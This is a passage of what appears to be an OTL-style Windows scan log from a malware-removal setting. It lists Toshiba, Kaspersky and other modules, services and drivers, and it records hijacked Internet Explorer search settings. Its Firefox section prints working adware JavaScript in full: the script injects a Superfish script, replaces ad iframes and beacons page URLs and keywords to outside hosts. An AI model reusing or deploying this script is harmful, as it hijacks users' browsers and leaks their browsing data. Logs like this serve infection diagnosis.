MOD - [2010/07/07 22:26:09 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\APM.Foundation\2.0.3428.28310__90ba9c70f846762e\APM.Foundation.dll
MOD - [2010/07/07 22:26:09 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\AEM.Server.Shared\2.0.3428.28304__90ba9c70f846762e\AEM.Server.Shared.dll
MOD - [2010/07/07 22:26:08 | 000,405,504 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Wizard\2.0.3497.38827__90ba9c70f846762e\CLI.Component.Wizard.dll
MOD - [2010/07/07 22:26:08 | 000,106,496 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\MOM.Implementation\2.0.3497.38894__90ba9c70f846762e\MOM.Implementation.dll
MOD - [2010/07/07 22:26:08 | 000,065,536 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\LOG.Foundation.Implementation\2.0.3497.38892__90ba9c70f846762e\LOG.Foundation.Implementation.dll
MOD - [2010/07/07 22:26:08 | 000,045,056 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\AEM.Plugin.Source.Kit.Server\2.0.3497.38904__90ba9c70f846762e\AEM.Plugin.Source.Kit.Server.dll
MOD - [2010/07/07 22:26:08 | 000,040,960 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Foundation.Private\2.0.3428.28301__90ba9c70f846762e\CLI.Foundation.Private.dll
MOD - [2010/07/07 22:26:08 | 000,036,864 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\LOG.Foundation.Private\2.0.3428.28303__90ba9c70f846762e\LOG.Foundation.Private.dll
MOD - [2010/07/07 22:26:08 | 000,024,576 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Wizard.Shared.Private\2.0.3428.28311__90ba9c70f846762e\CLI.Component.Wizard.Shared.Private.dll
MOD - [2010/07/07 22:26:08 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\ResourceManagement.Foundation.Private\2.0.3428.28303__90ba9c70f846762e\ResourceManagement.Foundation.Private.dll
MOD - [2010/07/07 22:26:08 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\LOG.Foundation.Implementation.Private\2.0.3428.28310__90ba9c70f846762e\LOG.Foundation.Implementation.Private.dll
MOD - [2010/07/07 22:26:08 | 000,007,168 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Runtime.Extension.EEU\2.0.3497.38810__90ba9c70f846762e\CLI.Component.Runtime.Extension.EEU.dll
MOD - [2010/07/07 22:26:07 | 001,212,416 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Dashboard\2.0.3497.38819__90ba9c70f846762e\CLI.Component.Dashboard.dll
MOD - [2010/07/07 22:26:07 | 000,057,344 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.SkinFactory\2.0.3497.38813__90ba9c70f846762e\CLI.Component.SkinFactory.dll
MOD - [2010/07/07 22:26:07 | 000,057,344 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Runtime\2.0.3497.38812__90ba9c70f846762e\CLI.Component.Runtime.dll
MOD - [2010/07/07 22:26:07 | 000,045,056 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Runtime.Shared.Private\2.0.3428.28311__90ba9c70f846762e\CLI.Component.Runtime.Shared.Private.dll
MOD - [2010/07/07 22:26:07 | 000,040,960 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Client.Shared.Private\2.0.3428.28308__90ba9c70f846762e\CLI.Component.Client.Shared.Private.dll
MOD - [2010/07/07 22:26:07 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Dashboard.Shared.Private\2.0.3428.28309__90ba9c70f846762e\CLI.Component.Dashboard.Shared.Private.dll
MOD - [2010/07/07 22:26:07 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Runtime.Shared.Private\2.0.3428.28316__90ba9c70f846762e\CLI.Caste.Graphics.Runtime.Shared.Private.dll
MOD - [2010/07/07 22:26:06 | 000,061,440 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\APM.Server\2.0.3497.38811__90ba9c70f846762e\APM.Server.dll
MOD - [2010/07/07 22:26:06 | 000,045,056 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\AEM.Server\2.0.3497.38810__90ba9c70f846762e\AEM.Server.dll
MOD - [2010/07/07 22:26:06 | 000,032,768 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\ATICCCom\2.0.0.0__90ba9c70f846762e\ATICCCom.dll
MOD - [2010/07/07 22:26:06 | 000,019,456 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CCC.Implementation\2.0.3497.38893__90ba9c70f846762e\CCC.Implementation.dll
MOD - [2009/09/17 14:36:34 | 000,079,192 | ---- | M] () -- C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll
MOD - [2009/07/25 10:07:12 | 000,058,704 | ---- | M] () -- C:\Program Files\TOSHIBA\TOSHIBA Disc Creator\NotifyTDC.dll
MOD - [2009/07/16 14:27:48 | 000,052,536 | ---- | M] () -- C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnZ.dll
MOD - [2009/07/16 14:27:44 | 007,263,544 | ---- | M] () -- C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll
MOD - [2009/06/22 14:38:40 | 000,015,160 | ---- | M] () -- C:\Program Files\TOSHIBA\TOSHIBA Assist\NotifyX.dll
MOD - [2009/05/04 09:45:14 | 000,016,384 | R--- | M] () -- C:\Program Files\ATI Technologies\ATI.ACE\Branding\Branding.dll
MOD - [2009/03/12 18:08:04 | 000,049,152 | ---- | M] () -- C:\Program Files\TOSHIBA\PCDiag\NotifyPCD.dll
 
 
========== Services (SafeList) ==========
 
SRV - [2014/11/07 18:57:56 | 000,114,288 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014/09/24 21:04:40 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/09/12 01:43:06 | 000,064,704 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014/09/11 21:09:49 | 000,255,040 | ---- | M] (WildTangent) [On_Demand | Stopped] -- C:\Program Files\WildTangent Games\App\GamesAppIntegrationService.exe -- (GamesAppIntegrationService)
SRV - [2014/08/22 11:44:44 | 000,022,192 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV - [2014/08/22 11:44:40 | 000,288,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV - [2014/05/17 12:52:30 | 000,203,344 | ---- | M] (WildTangent, Inc.) [On_Demand | Stopped] -- C:\Program Files\WildTangent Games\App\GamesAppService.exe -- (GamesAppService)
SRV - [2014/04/20 16:15:58 | 000,233,552 | ---- | M] (Kaspersky Lab ZAO) [Auto | Running] -- C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\avp.exe -- (AVP15.0.0)
SRV - [2012/11/20 07:36:01 | 000,042,504 | ---- | M] () [Auto | Stopped] -- C:\Program Files\TelevisionFanatic\bar\1.bin\64barsvc.exe -- (TelevisionFanaticService)
SRV - [2011/02/11 12:45:52 | 000,054,136 | ---- | M] (TOSHIBA Corporation) [On_Demand | Running] -- C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe -- (TMachInfo)
SRV - [2010/12/27 19:53:06 | 001,343,400 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\Wat\WatAdminSvc.exe -- (WatAdminSvc)
SRV - [2009/09/17 14:37:18 | 000,111,960 | ---- | M] (TOSHIBA Corporation) [On_Demand | Running] -- C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe -- (TOSHIBA HDD SSD Alert Service)
SRV - [2009/08/10 18:55:46 | 000,185,712 | ---- | M] (TOSHIBA CORPORATION) [Auto | Running] -- C:\Program Files\TOSHIBA\ConfigFree\CFIWmxSvcs.exe -- (cfWiMAXService)
SRV - [2009/08/05 13:18:50 | 000,464,224 | ---- | M] (TOSHIBA Corporation) [Auto | Running] -- C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe -- (TosCoSrv)
SRV - [2009/07/29 22:54:10 | 000,176,128 | ---- | M] (AMD) [Auto | Running] -- C:\Windows\System32\atiesrxx.exe -- (AMD External Events Utility)
SRV - [2009/07/28 14:43:04 | 000,128,344 | ---- | M] (TOSHIBA Corporation) [Auto | Running] -- C:\Windows\System32\TODDSrv.exe -- (TODDSrv)
SRV - [2009/07/13 17:16:13 | 000,025,088 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\sensrsvc.dll -- (SensrSvc)
SRV - [2009/07/13 17:15:41 | 000,680,960 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV - [2009/03/10 17:51:20 | 000,046,448 | ---- | M] (TOSHIBA CORPORATION) [Auto | Running] -- C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe -- (ConfigFree Service)
 
 
========== Driver Services (SafeList) ==========
 
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\RtsUCcid.sys -- (USBCCID)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\Rts516xIR.sys -- (RtsUIR)
DRV - [2014/11/09 17:08:44 | 000,644,808 | ---- | M] (Kaspersky Lab ZAO) [File_System | System | Running] -- C:\Windows\System32\drivers\klif.sys -- (KLIF)
DRV - [2014/11/09 17:08:44 | 000,112,136 | ---- | M] (Kaspersky Lab ZAO) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\klflt.sys -- (klflt)
DRV - [2014/11/09 16:52:34 | 000,039,464 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{F6AFC9AA-01D3-4483-9587-9FC470411F45}\MpKslc33e50aa.sys -- (MpKslc33e50aa)
DRV - [2014/11/09 11:28:49 | 000,114,904 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\System32\drivers\MBAMSwissArmy.sys -- (MBAMSwissArmy)
DRV - [2014/07/17 17:05:08 | 000,095,920 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\NisDrvWFP.sys -- (NisDrv)
DRV - [2014/04/10 17:25:32 | 000,034,400 | ---- | M] (Kaspersky Lab ZAO) [Kernel | System | Running] -- C:\Windows\System32\drivers\klhk.sys -- (klhk)
DRV - [2014/03/28 17:51:02 | 000,024,672 | ---- | M] (Kaspersky Lab ZAO) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\klkbdflt.sys -- (klkbdflt)
DRV - [2014/03/26 17:05:26 | 000,145,888 | ---- | M] (Kaspersky Lab ZAO) [Kernel | System | Running] -- C:\Windows\System32\drivers\kneps.sys -- (kneps)
DRV - [2014/03/25 16:26:04 | 000,045,024 | ---- | M] (Kaspersky Lab ZAO) [Kernel | System | Running] -- C:\Windows\System32\drivers\kltdi.sys -- (kltdi)
DRV - [2014/02/25 13:09:02 | 000,025,696 | ---- | M] (Kaspersky Lab ZAO) [Kernel | System | Running] -- C:\Windows\System32\drivers\klim6.sys -- (KLIM6)
DRV - [2014/02/20 12:59:02 | 000,135,264 | ---- | M] (Kaspersky Lab ZAO) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\kl1.sys -- (kl1)
DRV - [2013/08/08 17:10:58 | 000,025,696 | ---- | M] (Kaspersky Lab ZAO) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\klmouflt.sys -- (klmouflt)
DRV - [2013/04/12 15:34:48 | 000,014,432 | ---- | M] (Kaspersky Lab ZAO) [Kernel | System | Running] -- C:\Windows\System32\drivers\klpd.sys -- (klpd)
DRV - [2009/07/30 16:45:56 | 000,022,912 | ---- | M] (TOSHIBA Corporation.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\tdcmdpst.sys -- (tdcmdpst)
DRV - [2009/07/30 16:45:22 | 000,171,520 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\RtsUStor.sys -- (RSUSBSTOR)
DRV - [2009/07/30 11:06:30 | 004,994,560 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\atikmdag.sys -- (atikmdag)
DRV - [2009/07/14 14:28:42 | 000,023,512 | ---- | M] (TOSHIBA Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\TVALZ_O.SYS -- (TVALZ)
DRV - [2009/07/13 15:51:11 | 000,034,944 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\winusb.sys -- (WinUsb)
DRV - [2009/07/13 14:13:48 | 001,035,776 | ---- | M] (LSI Corp) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\AGRSM.sys -- (AgereSoftModem)
DRV - [2009/07/02 13:55:36 | 000,036,208 | ---- | M] (COMPAL ELECTRONIC INC.) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\LPCFilter.sys -- (LPCFilter)
DRV - [2009/05/04 23:30:28 | 000,014,392 | ---- | M] (Advanced Micro Devices Inc.) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\AtiPcie.sys -- (AtiPcie)
DRV - [2008/08/22 09:28:32 | 000,333,824 | ---- | M] (Realtek Semiconductor Corporation                           ) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\RTL8187Se.sys -- (RTL8187Se)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
IE - HKLM\..\SearchScopes,DefaultScope = {B13C4182-9A7F-4F29-B480-F668606BC906}
IE - HKLM\..\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}: "URL" = http://www.google.co...ng}&rlz=1I7TSNA
IE - HKLM\..\SearchScopes\{a5b9c0f5-5616-47cd-a95f-e43b488faccf}: "URL" = http://search.mywebs...r={searchTerms}
IE - HKLM\..\SearchScopes\{B13C4182-9A7F-4F29-B480-F668606BC906}: "URL" = http://astromenda.co...r=582993201&ir=
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://www.70searchengines.com/?op [Binary data over 200 bytes]
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://home.mywebsea...CFYF7Qgod_RIAQg
IE - HKCU\..\URLSearchHook: {0696f815-a3a9-490a-bb14-9ec3350b1276} - No CLSID value found
IE - HKCU\..\SearchScopes,DefaultScope = {B13C4182-9A7F-4F29-B480-F668606BC906}
IE - HKCU\..\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}: "URL" = http://www.google.co...TSNA_en___US411
IE - HKCU\..\SearchScopes\{a5b9c0f5-5616-47cd-a95f-e43b488faccf}: "URL" = http://search.mywebs...r={searchTerms}
IE - HKCU\..\SearchScopes\{B13C4182-9A7F-4F29-B480-F668606BC906}: "URL" = http://www.google.co...TSNA_en___US411
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
========== FireFox ==========
 
FF - prefs.js..extensions.HElMs8NivVoSsx0S.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"__ipm=\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"onduit\")>-1||url.match(/bing.com[^p]+pc=.+/)||url.match(/search.yahoo.com.+hspart=.+/)||url.indexOf(\"search.imesh\")>-1||url.indexOf(\"search.searchcore\")>-1||url.indexOf(\"searchnu.com\")>-1||url.indexOf(\"searchqu.com\")>-1||url.indexOf(\"shareazaweb\")>-1||url.indexOf(\"searchgby.com\")>-1||url.indexOf(\"mysearchresults.com\")>-1||url.indexOf(\"searchya.com\")>-1||url.indexOf(\"searchgol.com\")>-1||url.indexOf(\"trovi.com\")>-1||url.indexOf(\"search.ask\")>-1||url.indexOf(\"mywebsearch.com\")>-1||url.indexOf(\"search-results.com\")>-1||url.indexOf(\"mysearch.com\")>-1||url.indexOf(\"offers.bycontext.com\")>-1||url.indexOf(\"deals.offer-dynamics.com\")>-1||url.indexOf(\"offer-dynamics.com\")>-1||url.indexOf(\"www.livegeekhelp.com/pop/\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"Jerusalem.com\")>-1||url.indexOf(\"Vatican.com\")>-1||url.indexOf(\"iklk.com\")>-1||url.indexOf(\"gvud.com\")>-1||url.indexOf(\"zuzd.com\")>-1||url.indexOf(\"babaViral.com\")>-1||url.indexOf(\"cupid.so\")>-1||url.indexOf(\"hostanytime.com\")>-1||url.indexOf(\"antivirus.so\")>-1||url.indexOf(\"dates.am\")>-1||url.indexOf(\"insurance-company.co\")>-1||url.indexOf(\"advanceloan.org\")>-1||url.indexOf(\"calcitapp.info\")>-1||url.indexOf(\"desktopfavapp.info\")>-1||url.indexOf(\"?ctid=CT3330145\")>-1||url.indexOf(\"?ctid=CT3330146\")>-1||url.indexOf(\"?ctid=CT3330147\")>-1||url.indexOf(\"?ctid=CT3330148\")>-1||url.indexOf(\"?ctid=CT3330149\")>-1||url.indexOf(\"http://sporty-glow.com/\")>-1||url.indexOf(\"http://game-trek.net/\")>-1||url.indexOf(\"avatrade.com\")>-1||url.indexOf(\"game-trek.net\")>-1||url.indexOf(\"urgent-alerts.com\")>-1||url.indexOf(\"pc-alert.com\")>-1||url.indexOf(\"error-alerts.com\")>-1||url.match(/[/]websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info/)||url.indexOf(\"search.searchonme.com\")>-1||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"search.appsarefun.info\")>-1||url.indexOf(\"websearch.mocaflix.com\")>-1||url.indexOf(\"search.easylifeapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"us.yhs4.search.yahoo.com\")>-1||url.indexOf(\"search.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"bestonlinegadgetguide.com\")>-1||url.indexOf(\"odpu.com\")>-1||url.indexOf(\"safesearch.co\")>-1||url.indexOf(\"findamo.com\")>-1||url.indexOf(\"search.myownsearchbox.com\")>-1||url.indexOf(\"datropy.com\")>-1){return}}catch(e){};if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//www.superfish.com/ws/sf_main.jsp?dlsource=cbsfastsave&userId=1082116901308835839&CTID=p1&partnername=couponpeak\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;(function(){var stngs = {attr_name:'s17137475778365433519',szy_domain:[\"reportservingscore.info\",\"scoringserving.net\"],ad_sizes:[[728,90,1],[300,250,2],[468,60,3],[250,250,4],[160,600,5],[120,600,6],[120,240,7],[240,400,8],[300,600,10],[670,670,11],[600,270,12],[600,400,13],[125,125,14],[234,60,15],[200,200,16],[336,280,17],[180,150,18],[120,60,19],[800,440,20],[800,600,21]],checkif:function(ifr){return (ifr.getAttribute('s17137475778365433519') || ifr.src.indexOf('=506761')>-1||ifr.src.indexOf('=511181')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/^ap\\d+$/)))}};window.adzy653rk={nrnm:5,ifr:[],src:[],jbs:{ifr:[],at:[]},imp:{pid:\"1\",eid:\"682\",hid:\"17137475778365433519\",lt:\"1\",referrer:document.referrer,hostname:window.self.location.hostname,url:window.self.location.hostname,jpshort:\"5wVbM0aE\",rattr:stngs.attr_name,title:document.title,domain:stngs.szy_domain,sizes:stngs.ad_sizes},topHost:function(){if(window.self!=window.top){var a=decodeURIComponent(window.self.location.search).match(/http:\\/\\/[^&]+/);\nreturn a&&a[0]}return null}(),getKeywords:function(){var a=adzy653rk.imp.title,c=document.getElementsByTagName(\"meta\");if©for(var b=0,d=c.length;b<d;b++)\"keywords\"!=c[b].name.toLowerCase()&&\"description\"!=c[b].name.toLowerCase()||(a+=\" \"+c[b].content.replace(/,/g,\" \"));if(b=document.getElementsByTagName(\"a\")){c={};for(d=0;d<b.length;d++)try{var e=b[d].innerText;\"undefined\"==typeof e&&(e=b[d].textContent);for(var f=e.toLowerCase().split(/[\\s,-]/g),h=0;h<f.length;h++)4>f[h].length||(c[f[h]]?c[f[h]]++:\nc[f[h]]=1)}catch(k){}var e=[],g;for(g in c)e.push([g,c[g]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(g=0;g<e.length;g++)a+=\" \"+e[g][0]}return a.replace(/[_-]/g,\" \").substring(0,1024)},setMarker:function(){var a=document.getElementsByTagName(\"body\")[0];a&&!a.getAttribute(\"jhjlijpomuhn_l\")&&a.setAttribute(\"jhjlijpomuhn_m\",\"l\")},init:function(){adzy653rk.setMarker();var a=document.getElementsByTagName(\"iframe\");if(a.length){for(var c=[],b=0;b<a.length;b++)stngs.checkif(a[b])||(a[b].setAttribute(adzy653rk.imp.rattr,\n\"true\"),a[b].setAttribute(\"replaced\",\"true\"),c.push(a[b]));if(c.length){var d=function(a){if(a>=c.length){var b=adzy653rk.imp;adzy653rk.jbs.at.length?adzy653rk.getAds(\"//\"+adzy653rk.imp.domain[\"https:\"==window.self.location.protocol?1:0]+\"/?tid=1&size=\"+adzy653rk.jbs.at.join(\",\")+\"&subid=\"+b.pid+\"&subid1=\"+b.hid+\"&subid2=\"+b.eid+\"&lt=\"+b.lt+\"&k=\"+encodeURIComponent(adzy653rk.getKeywords())+(adzy653rk.topHost?\"&tdh=\"+encodeURIComponent(adzy653rk.topHost):\"\"),\"seta\"):adzy653rk.destruct()}else{if(b=\nadzy653rk.getAt(c[a]))adzy653rk.jbs.ifr.push(c[a]),adzy653rk.jbs.at.push(b);setTimeout(function(){d(++a)},1)}};d(0)}else adzy653rk.destruct()}else adzy653rk.destruct()},dfn:function(a){if(adzy653rk.ifr.length&&(a=a?a:1,!(300<a))){var c=function(b){b>=adzy653rk.ifr.length?setTimeout(function(){adzy653rk.dfn(++a)},1200):(adzy653rk.src[b]&&adzy653rk.ifr[b]&&adzy653rk.ifr[b].src!=adzy653rk.src[b][0]&&(adzy653rk.ifr[b].nextSibling.innerHTML&&adzy653rk.ifr[b].nextSibling.innerHTML.match(/<span[^>]?>Ads( not)? by/i)?\n(new Image).src=\"http://zig.installerdatauk.info/?aid=2&bid=1&hid=17137475778365433519&eid=682&pid=1&cid=0&c=\"+encodeURIComponent(adzy653rk.ifr[b].src):((new Image).src=\"http://zig.installerdatauk.info/?aid=1&bid=1&hid=17137475778365433519&eid=682&pid=1&cid=0&c=\"+encodeURIComponent(adzy653rk.ifr[b].src),adzy653rk.ifrset(adzy653rk.ifr[b],adzy653rk.src[b][1],1))),setTimeout(function(){c(++b)},1))};c(0)}},destruct:function(a){adzy653rk.jbs={ifr:[],\nat:[]};adzy653rk.rnm?adzy653rk.rnm++:(adzy653rk.rnm=1,setTimeout(adzy653rk.dfn,1200));adzy653rk.rnm<=adzy653rk.nrnm&&setTimeout(adzy653rk.init,1200)},getAt:function(a){a=[parseInt(\"number\"==typeof a.width||\"string\"==typeof a.width&&a.width.match(/[0-9]/)?a.width:a.scrollWidth),parseInt(\"number\"==typeof a.height||\"string\"==typeof a.height&&a.height.match(/[0-9]/)?a.height:a.scrollHeight)];for(var c=adzy653rk.imp.sizes,b=0;b<c.length;b++)if(a[0]>=c[b][0]-5&&a[0]<=c[b][0]+5&&a[1]>=c[b][1]-5&&a[1]<=c[b][1]+\n5)return c[b][2];return!1},getAds:function(a,c){if(-1<navigator.userAgent.indexOf(\"MSIE\")){var b=document.createElement(\"script\");b.type=\"text/javascript\";b.src=a+\"&cb=adzy653rk.\"+c;b.onreadystatechange=b.onload=function(){try{b.parentNode.removeChild(b)}catch(a){}};try{window.adzy653rk=adzy653rk,(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild(b)}catch(d){}}else{var e=new XMLHttpRequest;e.open(\"GET\",a,!0);e.onreadystatechange=function(){if(4==e.readyState)adzy653rk[c](e.response)};\ne.send(null)}},seta:function(a){var c=null;try{var b=adzy653rk.l.decode(a);\"undefined\"!=typeof JSON&&JSON.parse?c=JSON.parse(b):eval(\"ifrl = \"+b)}catch(d){}if(c&&c.length)for(a=0;a<c.length;a++)c[a]&&adzy653rk.jbs.ifr[a]&&adzy653rk.ifrset(adzy653rk.jbs.ifr[a],c[a]);adzy653rk.destruct()},ifrset:function(a,c,b){b||(adzy653rk.ifr.push(a),c[0]=c[0].replace(/\\[##([^#]+)##\\]/g,function(a,b){return adzy653rk.imp[toekn]?adzy653rk.imp[toekn]:\"\"}));var d=[\"<html><head><style>html,body{width:100%;height:100%;margin:0}</style></head><body>\",\n\"</body></html>\"];switch(c[1]){case 1:a.src=c[0]+(-1<c[0].indexOf(\"?\")?\"&\"+adzy653rk.imp.jpshort+\"=\"+c[2]+\"_18x18_0\":\"\");break;case 2:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+'<iframe src=\"'+c[0]+'\" style=\"width:100%;height:100%;border:0;\" scrolling=\"no\" frameborder=\"0\"></iframe>'+d[1])}catch(e){}break;case 3:case 6:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+c[0]+d[1])}catch(f){}}b||adzy653rk.src.push([a.src,c])},l:{xlat:\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\",\ndecode:function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var c=\"\",b=0;b<a.length;){var d=this.xlat.indexOf(a.charAt(b++)),e=this.xlat.indexOf(a.charAt(b++)),f=this.xlat.indexOf(a.charAt(b++)),h=this.xlat.indexOf(a.charAt(b++)),k=(e&15)<<4|f>>2,g=(f&3)<<6|h,c=c+String.fromCharCode(d<<2|e>>4);64!=f&&0<k&&(c+=String.fromCharCode(k));64!=h&&0<g&&(c+=String.fromCharCode(g))}return this._utf8_decode©},_utf8_decode:function(a){for(var c=\"\",b=0;b<a.length;){var d=a.charCodeAt(b);if(128>d)c+=\nString.fromCharCode(d),b++;else if(191<d&&224>d)var e=a.charCodeAt(b+1),c=c+String.fromCharCode((d&31)<<6|e&63),b=b+2;else var e=a.charCodeAt(b+1),f=a.charCodeAt(b+2),c=c+String.fromCharCode((d&15)<<12|(e&63)<<6|f&63),b=b+3}return c}}};\nadzy653rk.location = adzy653rk.imp.referrer+window.self.location.href;if(adzy653rk.location.indexOf(adzy653rk.imp.jpshort+\"=\")==-1 && adzy653rk.location.indexOf(\"adk2.co\")==-1 &&\"ads.mangomediaads.com optimizedby.brealtime.com www.adshost2.com ad.z5x.net exchange.admailtiser.com evzc.wdfbj.com ads3.mediashakers.com ad.yieldmanager.com ad.adserverplus.com servedby.adxplosions.com cdn.trkclk.net srv.aileronx.com smgadserver.com ads.ventivmedia.com servedby.adsplats.com ad.reachjunction.com ads.deliads.com ads.ad-maven.com advs.adgorithms.com ad.adnetwork.net gzas.synynyqj.com ads.incmd03.com cdn.adk2.com ads.mediawhite.com Servedby.bigfineads.com ads.incmd05.com a.ad-sys.com afx.tagcdn.com ads.geverads.netdna-cdn.com ads.mediasoul.net www.kbdadsfast.com adsrv.intelliad.com tala.intlsources.com an.z5x.net c5.zedo.com ty.bizwz.com ib.adnxs.com ad.jumbaexchange.com srv1.mediads.info tr.adsplats.com ads.sonobi.com ifh.wdfbj.com 